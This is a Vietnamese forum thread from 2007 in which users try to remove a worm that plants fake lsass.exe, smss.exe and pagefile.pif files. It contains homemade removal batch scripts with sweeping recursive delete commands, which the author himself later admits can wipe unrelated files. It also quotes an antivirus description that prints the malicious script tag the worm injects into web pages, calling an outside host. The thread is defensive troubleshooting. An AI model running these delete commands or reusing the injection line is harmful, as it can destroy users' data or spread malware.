banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận virus, trojan, spyware, worm... pagefile.pif, LSASS.EXE, SMSS.EXE  XML
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 20/12/2007 22:25:26 (+0700) | #31 | 104943
noobxxx
Member

[Minus]    0    [Plus]
Joined: 09/06/2005 08:10:58
Messages: 22
Offline
[Profile] [PM]
Mình thấy con virus này thật là rắc rối, như trường hợp mình bị là file ~.exe nó ẩn trong tất cả các thư mục startup của các user, có 4 file nằm trong thư mục system32\com là lsass.exe, smss.exe, và 2 file gì nữa ctf gì gì đó. Trước khi kill process lần một mình bị auto shutdown, lần 2 mình gõ shutdown -a, thì nó không shutdown nhưng nó tự gọi ra thêm 1 loạt các file nhỏ, như ở các ổ logic nó xuất hiện 1 file tên kiểu như 1523241.exe rồi nó chạy thêm 1 file trong windows là nfsnut.exe, rồi cũng tự gọi thêm 1 file là ctfmon.exe. Không rõ là do nhiễm nên gọi nhiều hay sao vậy, và có một file nhỏ mình thấy nó hiện ra sau đó mất ngay là calcs.exe nằm cạnh file cacl.exe là cái máy tính con đó. Mình có 2 máy, 1 máy sau khi làm như bạn ghost nói + quét bằng lion thì nó bình thường, còn máy kia sau khi làm xong nó chạy như kiểu bị đơ, cực kỳ chậm, không rõ là bị sao nữa. Đấy là vài hiện tượng ở máy mình.
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 20/12/2007 23:03:40 (+0700) | #32 | 104948
[Avatar]
Look2Me
Member

[Minus]    0    [Plus]
Joined: 26/07/2006 23:30:57
Messages: 235
Location: Tủ quần nào
Offline
[Profile] [PM]
Nói câu này bác Hoàng đừng buồn nhé:"Nghĩ đi nghĩ lại thì tất cả các virus mà FH của bác H cập nhật đều thuộc dạng không đủ độ khó".
^^
Em nghĩ bác nên pt module diệt rootkit và virus lây file đi.
Đẳng cấp của 1 antivirus là nằm ở chỗ đó.
Bác làm 1 mình thì rõ ràng không thể ăn nhằm ở việc đua tốc độ cập nhật được.
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 21/12/2007 00:04:38 (+0700) | #33 | 104961
[Avatar]
VXer
Member

[Minus]    0    [Plus]
Joined: 20/12/2007 10:22:40
Messages: 44
Offline
[Profile] [PM]
Mình nghĩ cũng phải thông cảm cho bác Hoàng, một mình vừa phải lo reverse, code ... nên cũng chưa thể đưa ra một sản phẩm hoàn thiện được. Nhưng những module lây file và rootkit đúng là không thể thiếu, nhất là trong thời điểm hiện tại khi mà việc viết những virus này cũng trở nên khá phổ biến do có sẵn rất nhiều module, source trên mạng. Mong bác Hoàng tiếp tục cố gắng, chúc bác thành công smilie
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 21/12/2007 02:46:35 (+0700) | #34 | 104995
[Avatar]
Ghost Ship
Member

[Minus]    0    [Plus]
Joined: 21/03/2007 12:10:46
Messages: 467
Location: Đáy biển
Offline
[Profile] [PM]

noobxxx wrote:
Mình thấy con virus này thật là rắc rối, như trường hợp mình bị là file ~.exe nó ẩn trong tất cả các thư mục startup của các user, có 4 file nằm trong thư mục system32\com là lsass.exe, smss.exe, và 2 file gì nữa ctf gì gì đó. Trước khi kill process lần một mình bị auto shutdown, lần 2 mình gõ shutdown -a, thì nó không shutdown nhưng nó tự gọi ra thêm 1 loạt các file nhỏ, như ở các ổ logic nó xuất hiện 1 file tên kiểu như 1523241.exe rồi nó chạy thêm 1 file trong windows là nfsnut.exe, rồi cũng tự gọi thêm 1 file là ctfmon.exe. Không rõ là do nhiễm nên gọi nhiều hay sao vậy, và có một file nhỏ mình thấy nó hiện ra sau đó mất ngay là calcs.exe nằm cạnh file cacl.exe là cái máy tính con đó. Mình có 2 máy, 1 máy sau khi làm như bạn ghost nói + quét bằng lion thì nó bình thường, còn máy kia sau khi làm xong nó chạy như kiểu bị đơ, cực kỳ chậm, không rõ là bị sao nữa. Đấy là vài hiện tượng ở máy mình.  


Mình đã kiểm tra lại tất cả các startup của các user nhưng kô thấy thêm file ~.exe nào --> ở máy của mình nó chỉ tạo ra 1 file ~.exe trong user kích hoạt virus.

Bạn đã kill các process của nó như thế nào vậy? nếu bạn kể ra thì có thể mọi người sẽ nhìn ra điểm chưa hợp lý dẫn đến tình trạng đó.

Bạn nên search trong ổ C với từ khóa là dấu chấm (.) để liệt kê tất cả các file có trong ổ rồi sắp xếp chúng theo thứ tự date created --> bạn sẽ xác định được những file tạo ra trong ổ cùng thời điểm virus được kích hoạt --> xác định được file nào do virus tạo ra(nếu virus kô có tính năng thay đổi thuộc tính này của file).

Rất vui vì sự chia sẻ của bạn, đó quả là những thông tin rất có ích. Mình nghĩ nếu mọi người đều post lên các thông tin như của bạn thì sẽ giúp chúng ta hiểu về nó hơn khắc phục những điểm mà chúng ta chưa tự tìm ra --> topic sẽ rất có chất lượng. xin cám ơn sự chia sẻ của bạn! smilie
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 21/12/2007 11:04:23 (+0700) | #35 | 105108
mrda_writer
Member

[Minus]    0    [Plus]
Joined: 11/12/2007 23:13:41
Messages: 3
Offline
[Profile] [PM]
Không biết máy nhà các cậu có triệu chứng này không chứ máy nhà tớ lại có.....Khi bật Task Manager lên thì nó liên tục hiện ra các file "IEXPLORE.EXE" Những file này thì có thể kill được nhưng bằng thừa vì nó liên tục hiện ra ngốn RAM liên tục.......Kill không xuể....Ngoài ra thỉnh thoảng máy lại hiện ra bảng Dont Sent File "LSASS.EXE" Ai mà tìm được phần mềm nào kill được con này hay cách nào để diệt được con này thì chia sẻ cho mọi người nhanh nhanh nhé......Nguy hiểm quá
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 21/12/2007 14:37:15 (+0700) | #36 | 105161
[Avatar]
Ghost Ship
Member

[Minus]    0    [Plus]
Joined: 21/03/2007 12:10:46
Messages: 467
Location: Đáy biển
Offline
[Profile] [PM]

mrda_writer wrote:
Không biết máy nhà các cậu có triệu chứng này không chứ máy nhà tớ lại có.....Khi bật Task Manager lên thì nó liên tục hiện ra các file "IEXPLORE.EXE" Những file này thì có thể kill được nhưng bằng thừa vì nó liên tục hiện ra ngốn RAM liên tục.......Kill không xuể....Ngoài ra thỉnh thoảng máy lại hiện ra bảng Dont Sent File "LSASS.EXE" Ai mà tìm được phần mềm nào kill được con này hay cách nào để diệt được con này thì chia sẻ cho mọi người nhanh nhanh nhé......Nguy hiểm quá 
Cậu có chắc con máy cậu đang nhiễm là con mà topic này đang nói kô? Cậu thử xem lại xem trong danh sách Process có mấy cái LSASS.EXE nếu có 2 cái thì mới đúng là con này (1 cái là của win)

Cậu đã down FH của bác Hoàng về thử chưa? bác Hoàng đã update rồi thì chắc là FH kill mấy cái process kia được thôi. con này chắc là chưa biết FH nên chắc là nó sẽ kô ngăn FH thịt nó đâu :Vào đây để download FH: http://fasthelper.fire-lion.com/

Hoặc là thử xin bạn quanghabk share cái tool mà bạn ấy viết cho con này xem smilie nó phục hồi được cả các file bị ăn nữa đấy. kô biết bạn quanghabk có vui lòng share kô nhỉ? smilie hay bạn chỉ nói quản cáo vậy thôi smilie
[Up] [Print Copy]
  [Question]   Re:pagefile.pif, LSASS.EXE, SMSS.EXE 21/12/2007 23:48:48 (+0700) | #37 | 105209
NGVANTEO
Member

[Minus]    0    [Plus]
Joined: 21/12/2007 01:50:32
Messages: 5
Offline
[Profile] [PM]
Chào mọi người tôi thấy diễn đàn rất hay , nên muốn góp vài câu
Đối với việc nhiểm file EXE dùng http://fasthelper.fire-lion.com/ cua Bác Hoàng để diệt
Khi virus đã nạp vào máy tôi dùng tập lệnh batch để Remove toàn bộ như sau.
Tải file lsass.rar tại đây : http://www.uploading.com/files/03HRVXBQ/lsass.rar.html
Trong do gom co 3 file Start.bat Lsass.bat và Lsass.reg
Chep ba file này vào trong thư mực gốc ổ đĩa c:\
Đóng lại tất cả các ứng dụng
Nhấn đúp vào file Start.bat để chạy.
Máy tính sẽ tự động thiết lập và re start lại máy tính.
Virus sẽ bi remove sau khi máy tính khởi động lại.
Duoi đây là nội dung từng file:

File Start.bat

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v lsass /t reg_sz /d "c:\lsass.bat" /F
REG IMPORT c:\LSASS.REG
shutdown -r -f -t 0

File Lsass.bat

echo off
CD\
CD %SYSTEMDRIVE%\DOCUMENTS AND SETTINGS\DEFAULT USER\START MENU\PROGRAMS\STARTUP
DEL ~.EXE /A
CD\
CD %SYSTEMDRIVE%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\START MENU\PROGRAMS\STARTUP
DEL ~.EXE /A
CD\
CD %SYSTEMDRIVE%\DOCUMENTS AND SETTINGS\ALL USERS\START MENU\PROGRAMS\STARTUP
DEL ~.EXE /A
CD\
CD %USERPROFILE%\START MENU\PROGRAMS\STARTUP
DEL ~.EXE /A

DEL C:\AUTORUN.INF /A:RHS
DEL C:\PAGEFILE.PIF /A
DEL D:\AUTORUN.INF /A:RHS
DEL D:\PAGEFILE.PIF /A
DEL E:\AUTORUN.INF /A:RHS
DEL E:\PAGEFILE.PIF /A
DEL F:\AUTORUN.INF /A:RHS
DEL F:\PAGEFILE.PIF /A
DEL G:\AUTORUN.INF /A:RHS
DEL G:\PAGEFILE.PIF /A
DEL H:\AUTORUN.INF /A:RHS
DEL H:\PAGEFILE.PIF /A
DEL I:\AUTORUN.INF /A:RHS
DEL I:\PAGEFILE.PIF /A
DEL J:\AUTORUN.INF /A:RHS
DEL J:\PAGEFILE.PIF /A
DEL K:\AUTORUN.INF /A:RHS
DEL K:\PAGEFILE.PIF /A
DEL L:\AUTORUN.INF /A:RHS
DEL L:\PAGEFILE.PIF /A

DEL %SYSTEMROOT%\SYSTEM32\COM\SMSS.EXE /A
DEL %SYSTEMROOT%\SYSTEM32\COM\LSASS.EXE /A
DEL %SYSTEMROOT%\SYSTEM32\COM\NETCFG.DLL /A
DEL %SYSTEMROOT%\SYSTEM32\COM\NETCFG.000 /A

DEL %SYSTEMROOT%\SYSTEM32\DRIVERS\ALG.EXE /A
DEL %SYSTEMROOT%\SYSTEM32\DRIVERS\NPF.SYS /A

DEL %SYSTEMROOT%\SYSTEM32\DNSQ.DLL /A
DEL %SYSTEMROOT%\SYSTEM32\000.CFG0 /A
DEL %SYSTEMROOT%\SYSTEM32\PACKET.DLL /A
DEL %SYSTEMROOT%\SYSTEM32\PTHREADVC.DLL /A
DEL %SYSTEMROOT%\SYSTEM32\WPCAP.DLL /A
DEL %SYSTEMROOT%\SYSTEM32\APPAND.EXE /A
DEL %SYSTEMROOT%\SYSTEM32\NTFSUS.EXE /A

CD\
CD %USERPROFILE%\Local Settings\Temp
DEL *.* /s /f /q /a
cd..
rd /s /q temp

cd\
cd %USERPROFILE%\Local Settings\Temporary Internet Files
ATTRIB -R -H -S -A *.* /S /D
DEL *.* /f /q /a /s
DEL *.*

cd\
cd %USERPROFILE%\Local Settings\Cookies
ATTRIB -R -H -S -A *.* /S /D
DEL *.* /f /q /a /s
DEL *.*

reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /V lsass /F
echo on
EXIT

FILE LSASS.REG
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}]
@="DiskDrive"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}]
@="DiskDrive"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden]
"Type"="checkbox"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"CheckedValue"=dword:00000001
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 22/12/2007 01:40:58 (+0700) | #38 | 105226
[Avatar]
Ghost Ship
Member

[Minus]    0    [Plus]
Joined: 21/03/2007 12:10:46
Messages: 467
Location: Đáy biển
Offline
[Profile] [PM]

NGVANTEO wrote:
Chào mọi người tôi thấy diễn đàn rất hay , nên muốn góp vài câu
Đối với việc nhiểm file EXE dùng http://fasthelper.fire-lion.com/ cua Bác Hoàng để diệt
Khi virus đã nạp vào máy tôi dùng tập lệnh batch để Remove toàn bộ như sau.
Tải file lsass.rar tại đây : http://www.uploading.com/files/03HRVXBQ/lsass.rar.html
Trong do gom co 3 file Start.bat Lsass.bat và Lsass.reg
Chep ba file này vào trong thư mực gốc ổ đĩa c:\
Đóng lại tất cả các ứng dụng
Nhấn đúp vào file Start.bat để chạy.
Máy tính sẽ tự động thiết lập và re start lại máy tính.
Virus sẽ bi remove sau khi máy tính khởi động lại.
Duoi đây là nội dung từng file:
...  

Thật tuyệt smilie tuy chưa thử và chưa hiểu hết ý nghĩa của code nhưng mình thấy đây là một hướng giải quyết rất hay. Mình sẽ cho nó vào bộ skill của mình smilie cảm ơn pác NGVANTEO rất nhiều smilie

à em nghĩ chỗ này chưa hợp lý lắm:
Code File Start.bat:
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v lsass /t reg_sz /d "c:\lsass.bat" /F
REG IMPORT c:\LSASS.REG
shutdown -r -f -t 0  

REG IMPORT c:\LSASS.REG <-- Em nghĩ kô nên làm vào lúc này (khi virus vẫn đang hoạt động). vẫn còn hơi sớm vì nhiều con nó liên tục kiểm tra những thay đổi của nó đối với win nếu thấy ta sửa lại thì nó cũng sửa lại ngay. Em nghĩ nên cho dòng này vào cuối file Lsass.bat thì hợp hơn.

Mà nếu em kô nhầm thì cái file Lsass.bat cũng được kích hoạt lúc vào win (cùng thời điểm với virus nhưng kô biết cái nào sẽ chạy trước?) nếu file Lsass.bat chạy trước file ~.exe và del file ~.exe trước khi nó được kích hoạt thì mới thành công còn kô thì "shutdown -r -f -t 0" là vô nghĩa. smilie kô biết em nói vậy có đúng kô? Bác NGVANTEO đã thử trước khi post chưa ? smilie

Chúng ta có thể kiểm tra xem file nào được kick hoạt trước bằng cách:
1. Sửa nội dung của file Start.bat thành:
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v lsass /t reg_sz /d "c:\lsass.bat" /F
shutdown -r -f -t 0  

2. tạo ra 1 file a.bat trong %USERPROFILE%\START MENU\PROGRAMS\STARTUP có nội dung như sau:
echo off ;dòng này có tác dụng gì vậy các pác? smilie
DEL C:\lsass.bat  

3. tạo trong C: một file lsass.bat có nội dung như sau:
echo off
cd\
cd %USERPROFILE%\START MENU\PROGRAMS\STARTUP
DEL a.bat 

4. Click đúp vào file Start.bat smilie

5. Sau khi máy restart thì vào kiểm tra xem file nào còn tồn tại (a.bat hay lsass.bat) Nếu lsass.bat còn thì kết luận file trong startup được kích hoạt sau smilie

ai thử hộ mình cái nhỉ? mình ngại retart lại máy lắm thôi để lúc nào tắy máy thì làm vậy smilie

Skill mới để vô hiệu những virus cứng đầu: sử dụng kiểu kích hoạt nhanh nhất trong các kiểu kích hoạt khi vào win để kích hoạt một file có chức năng del file được kích hoạt của virus --> virus sẽ kô được kích hoạt --> Trận chiến kết thúc -> dọn rẹp chiến trường smilie

Vấn đề là phải tìm ra có bao nhiêu cách kích hoạt file khi vào win và cách nào được Win dùng đâu tiên. smilie

[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 22/12/2007 13:45:27 (+0700) | #39 | 105315
[Avatar]
Ghost Ship
Member

[Minus]    0    [Plus]
Joined: 21/03/2007 12:10:46
Messages: 467
Location: Đáy biển
Offline
[Profile] [PM]
Kết quả: file a.exe trong startup đã thắng smilie có vẻ cách này kô khả thi rồi. pác NGVANTEO đã thử tác dụng của mấy file .bat chưa nhỉ? smilie
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 23/12/2007 02:26:36 (+0700) | #40 | 105370
[Avatar]
proxxmaxx
Member

[Minus]    0    [Plus]
Joined: 20/12/2007 11:52:03
Messages: 6
Offline
[Profile] [PM] [Yahoo!]
Bác GS thử chưa?
Kết quả mất một đống file hệ thống smilie
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 23/12/2007 04:45:47 (+0700) | #41 | 105391
[Avatar]
Ghost Ship
Member

[Minus]    0    [Plus]
Joined: 21/03/2007 12:10:46
Messages: 467
Location: Đáy biển
Offline
[Profile] [PM]

proxxmaxx wrote:
Bác GS thử chưa?
Kết quả mất một đống file hệ thống smilie  

sao lại mất file hệ thống nhỉ? nó chỉ xóa những file của virus và những file rác của hệ thống thôi mà. kô biết nó có thịt được con virus kia kô thôi chứ nó thì an toàn chạy kô sao đâu. smilie
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 23/12/2007 12:10:57 (+0700) | #42 | 105459
[Avatar]
VXer
Member

[Minus]    0    [Plus]
Joined: 20/12/2007 10:22:40
Messages: 44
Offline
[Profile] [PM]

Ghost Ship wrote:
sao lại mất file hệ thống nhỉ? nó chỉ xóa những file của virus và những file rác của hệ thống thôi mà. kô biết nó có thịt được con virus kia kô thôi chứ nó thì an toàn chạy kô sao đâu. smilie 


Virus lây file mà! Có thể nó lây vào các file hệ thống, rồi sau đó AV disinfect hỏng file (hoặc delete hay quarantine gì đó) -> Mất file hệ thống.
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 23/12/2007 13:28:11 (+0700) | #43 | 105475
[Avatar]
Ghost Ship
Member

[Minus]    0    [Plus]
Joined: 21/03/2007 12:10:46
Messages: 467
Location: Đáy biển
Offline
[Profile] [PM]

VXer wrote:

Ghost Ship wrote:
sao lại mất file hệ thống nhỉ? nó chỉ xóa những file của virus và những file rác của hệ thống thôi mà. kô biết nó có thịt được con virus kia kô thôi chứ nó thì an toàn chạy kô sao đâu. smilie 

Virus lây file mà! Có thể nó lây vào các file hệ thống, rồi sau đó AV disinfect hỏng file (hoặc delete hay quarantine gì đó) -> Mất file hệ thống. 
Thử ở đây kô phải là thử chạy virus mà là thử mấy file .bat vừa được up lên, mà mấy file .bat ấy thì an toàn nên kô thể mất file hệ thống được, chỉ có mất file rác của hệ thống thôi.

Có lẽ các thông tin về con này như vậy là đã đủ. Nếu ko có gì mới mẻ thì chúng ta nên kết thúc ở đây smilie
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 24/12/2007 08:23:38 (+0700) | #44 | 105592
[Avatar]
o0_Virgo_0o
Member

[Minus]    0    [Plus]
Joined: 25/09/2005 17:05:55
Messages: 3
Offline
[Profile] [PM]
Kết thúc sao được.
Đúng ngày hôm sau thi môn INT cần mang lap đến lớp thì em dính con LSASS và SMSS. Ôi, copy bài vào USB cho thằng bạn, nó kêu vừa làm lại máy ( có ngờ đâu rằng ổ khác vẫn còn), thế nà em dính. Về nó cứ bật lên cái bài nhạc trung quốc gì gì ấy. Hic, nhờ các bài viết trong này, và 1 số bài viết ở đâu đó, e tự tay kill được nó roài, đúng 12h đêm, ngày 19/12 thì phải. Con này e thấy có bài viết ở chỗ khác từ năm 06, nhưng h... tái xuất giang hồ hay sao ấy nhẩy? smilie

He, thấy diễn đàn hay, h e là thành viên của diễn đàn roài. Nhưng đăng nhập chậm mà cứ bắt cài cái flassh j ấy nhỉ????
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 24/12/2007 08:33:50 (+0700) | #45 | 105597
[Avatar]
o0_Virgo_0o
Member

[Minus]    0    [Plus]
Joined: 25/09/2005 17:05:55
Messages: 3
Offline
[Profile] [PM]
smilie Ah quên, phải nói như cái bác j ở... entry đầu tiên, sợ hãi pha lẫn hưng phấn. Diệt xong thì... nhẹ nhõm và thích thú.
[Up] [Print Copy]
  [Question]   Re:pagefile.pif, LSASS.EXE, SMSS.EXE 25/12/2007 00:04:12 (+0700) | #46 | 105725
NGVANTEO
Member

[Minus]    0    [Plus]
Joined: 21/12/2007 01:50:32
Messages: 5
Offline
[Profile] [PM]
Trong bài lần trước nếu trong máy không có thư mục Temp, thì sau lệnh CD\ và del *.* sẽ bị xóa hàng loạt file smilie. Đúng là quá sai lầm. Nhân tiện cũng cảm ơn bác GS đã góp ý về bài của tôi

Sau đây tôi đề nghị cách giải quyết khác cũng bằng file Bat.
- Như đã biết sau khi virút đã nạp vào bộ nhớ thì ta không thể xóa file LSASS, SMSS... , mặt khác nó sẽ nhiểm vào các file cùng load với virút trong memory do đó khi ta kill virut thì các chương trình bị nhiểm sẽ tự động gọi lại virút.

- Điều gì sẽ xảy ra khi ta SUSPEND virút, mã lệnh vi rút không còn phát tán trong memory, các file nạp vào sau KHÔNG THỂ BỊ NHIỂM.

Sau đây là 4 file A.bat B.bat LSASS.REG và process.exe
http://www.uploading.com/files/XH6OR7QY/A.rar.html
1. Chép 4 file vào thư mục gốc ổ đĩa C.
2. dùng lệnh Run : c:\proccess -v để xác định PID của LSASS và SMSS (chú ý không phải của hệ thống)
3. Dùng Edit của Windows mở hai file A.bat và B.bat, chỉnh lại X là mã PID của LSASS, và Y là mã PID của SMSS sau đó save lại.
4. Nhấp đúp vào file A.bat.


A.bat

C:\PROCESS -S X
C:\PROCESS -S Y

C:\PROCESS -K Explorer.exe
C:\PROCESS -K TLNTSVR.EXE
C:\C:\PROCESS -K IEXPLORE.EXE
C:\C:\PROCESS -K RAR.EXE
CALL B.BAT
EXIT

B.bat

C:\PROCESS -k X
C:\PROCESS -k Y

%SYSTEMROOT%\EXPLORER.EXE /A
C:\PROCESS -V
ECHO NHAN PHIM BAT KI DE TIEP TUC...
PAUSE

CD\
CD %SYSTEMDRIVE%\DOCUMENTS AND SETTINGS\ALL USERS\START MENU\PROGRAMS\STARTUP
ATTRIB -R -H -S -A ~.EXE
DEL ~.EXE /A

CD\
CD %USERPROFILE%\START MENU\PROGRAMS\STARTUP
ATTRIB -R -H -S -A ~.EXE
DEL ~.EXE /A

DEL C:\AUTORUN.INF /A:RHS
DEL C:\PAGEFILE.PIF /A
DEL D:\AUTORUN.INF /A:RHS
DEL D:\PAGEFILE.PIF /A
DEL E:\AUTORUN.INF /A:RHS
DEL E:\PAGEFILE.PIF /A
DEL F:\AUTORUN.INF /A:RHS
DEL F:\PAGEFILE.PIF /A
DEL %SYSTEMROOT%\SYSTEM32\COM\SMSS.EXE /A
DEL %SYSTEMROOT%\SYSTEM32\COM\LSASS.EXE /A
DEL %SYSTEMROOT%\SYSTEM32\COM\NETCFG.DLL /A
DEL %SYSTEMROOT%\SYSTEM32\COM\NETCFG.000 /A

DEL %SYSTEMROOT%\SYSTEM32\DRIVERS\ALG.EXE /A
DEL %SYSTEMROOT%\SYSTEM32\DRIVERS\NPF.SYS /A

DEL %SYSTEMROOT%\SYSTEM32\DNSQ.DLL /A
DEL %SYSTEMROOT%\SYSTEM32\000.CFG0 /A
DEL %SYSTEMROOT%\SYSTEM32\PACKET.DLL /A
DEL %SYSTEMROOT%\SYSTEM32\PTHREADVC.DLL /A
DEL %SYSTEMROOT%\SYSTEM32\WPCAP.DLL /A
DEL %SYSTEMROOT%\SYSTEM32\APPAND.EXE /A
DEL %SYSTEMROOT%\SYSTEM32\NTFSUS.EXE /A

REG IMPORT c:\LSASS.REG
EXIT

FILE LSASS.REG
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}]
@="DiskDrive"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}]
@="DiskDrive"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden]
"Type"="checkbox"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"CheckedValue"=dword:00000001


[Up] [Print Copy]
  [Question]   Re:pagefile.pif, LSASS.EXE, SMSS.EXE 25/12/2007 00:21:26 (+0700) | #47 | 105730
NGVANTEO
Member

[Minus]    0    [Plus]
Joined: 21/12/2007 01:50:32
Messages: 5
Offline
[Profile] [PM]
Chú ý trước khi chạy file A.BAT hãy đóng lại tất cả các ứng dụng chỉ để lại Explore.exe

[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 25/12/2007 00:21:33 (+0700) | #48 | 105731
born2die
Member

[Minus]    0    [Plus]
Joined: 17/12/2007 11:49:02
Messages: 16
Offline
[Profile] [PM]
Bkav vẫn cập nhật con này đều đều mà. Trong miêu tả mới nhất thì đã đến phiên bản H rồi kìa (8 biến thể roài).
Con này lây vào các file thực thi và các file html nhưng nó chừa ổ đĩa hệ thống (có lẽ vì vậy mà GS mới diệt bằng tay thành công, không thì đừng có mơ).

Malware cập nhật mới nhất:

Tên malware: W32.DashferH.PE
Thuộc họ: W32.Dashfer.PE
Loại: PE
Ngày phát hiện mẫu: 22/12/2007
Kích thước: 100Kb
Mức độ phá hoại: Cao
Nguy cơ:

Làm giảm mức độ an ninh của hệ thống.
Hiện tượng:

Sửa registry.
Không vào được chế độ safe mode của windows.
Mất checkbox để hiển thị các file hệ thống.
Cách thức lây nhiễm:

Phát tán qua trang web.
Tự động lây nhiễm qua USB.
Lây qua các file thực thi.
Cách phòng tránh:

Không nên vào các trang web cung cấp các phần mềm crack, hack, các trang web đen, độc hại
Không nên mở ổ USB bằng cách nháy kép vào biểu tượng ổ đĩa.
Mô tả kỹ thuật:

Xóa các key :
HKLM\...\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\...\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\...\Windows\CurrentVersion\Run
Copy bản thân thành file có tên "lsass.exe" vào thư mục %SysDir%\Com, và ~.exe vào thư mục Startup
Tạo ra các file :
%SysDir%\Com\smss.exe
%SysDir%\Com\netcfg.dll
%SysDir%\Com\netcfg.000
Sửa key làm mất checkbox để hiển thị các file hệ thống.
Copy bản thân thành file có tên : "pagefile.pif" kèm theo file autorun.inf vào tất cả các ổ đĩa.
Tắt các process có chứa một trong các xâu sau : asm, ida, softice, ollydbg, metapad, mozillauiwindowclass, ieframe, cabinetwclass, 360
Thêm vào cuối các file có đuôi: jsp, php, spx, asp, tml, htm tìm thấy trên máy trừ ổ đĩa hệ thống (kể cả trong các file nén .rar) đoạn script :
<script src="http://js.k01[removed].com/01.asp"></script>
Lây nhiễm vào các file thực thi tìm được trong máy trừ ổ đĩa hệ thống.
 
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 25/12/2007 01:49:15 (+0700) | #49 | 105753
[Avatar]
Ghost Ship
Member

[Minus]    0    [Plus]
Joined: 21/03/2007 12:10:46
Messages: 467
Location: Đáy biển
Offline
[Profile] [PM]

born2die wrote:
Con này lây vào các file thực thi và các file html nhưng nó chừa ổ đĩa hệ thống (có lẽ vì vậy mà GS mới diệt bằng tay thành công, không thì đừng có mơ). 
vậy nếu nó kô chừa mấy file hệ thống thì các AV có diệt được nó kô? hay là del hết file OS bị nhiễm rồi cho khổ chủ làm lại win?

Nói cho cậu biêt dù nó có ăn file hệ thống thì cách diệt của tôi vẫn thịt được nó mà kô cần làm lại win. kô có hiểu biết về chuyện gì thì ko nên đưa ra những nhận định như làm người khác khó chịu như thế
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 25/12/2007 07:11:07 (+0700) | #50 | 105842
born2die
Member

[Minus]    0    [Plus]
Joined: 17/12/2007 11:49:02
Messages: 16
Offline
[Profile] [PM]
Máy cài 2 win, bị nhiễm virus ở win này -> win kia bị lây tràn lan. Vừa dùng Bkav xong giờ ngon lành.

GhostShip thử phát smilie

Mà nói thật chứ, nói câu không diệt được lây file có gì sai đâu mà không nhận nhỉ. Bản thân tôi nhận luôn là không tự diệt được worm, nhưng quan trọng là tôi sẽ cố gắng để diệt được. Chứ không nhận, lảng tránh thì đến bao giờ mới khá lên được. Đôi lời....
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 25/12/2007 10:18:06 (+0700) | #51 | 105872
neo85
Member

[Minus]    0    [Plus]
Joined: 06/07/2007 10:16:40
Messages: 7
Offline
[Profile] [PM]

born2die wrote:
Máy cài 2 win, bị nhiễm virus ở win này -> win kia bị lây tràn lan. Vừa dùng Bkav xong giờ ngon lành.

GhostShip thử phát smilie

Mà nói thật chứ, nói câu không diệt được lây file có gì sai đâu mà không nhận nhỉ. Bản thân tôi nhận luôn là không tự diệt được worm, nhưng quan trọng là tôi sẽ cố gắng để diệt được. Chứ không nhận, lảng tránh thì đến bao giờ mới khá lên được. Đôi lời.... 


He he đồng chí này là BKAV lover hả smilie
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 25/12/2007 14:55:56 (+0700) | #52 | 105925
[Avatar]
Ghost Ship
Member

[Minus]    0    [Plus]
Joined: 21/03/2007 12:10:46
Messages: 467
Location: Đáy biển
Offline
[Profile] [PM]

born2die wrote:
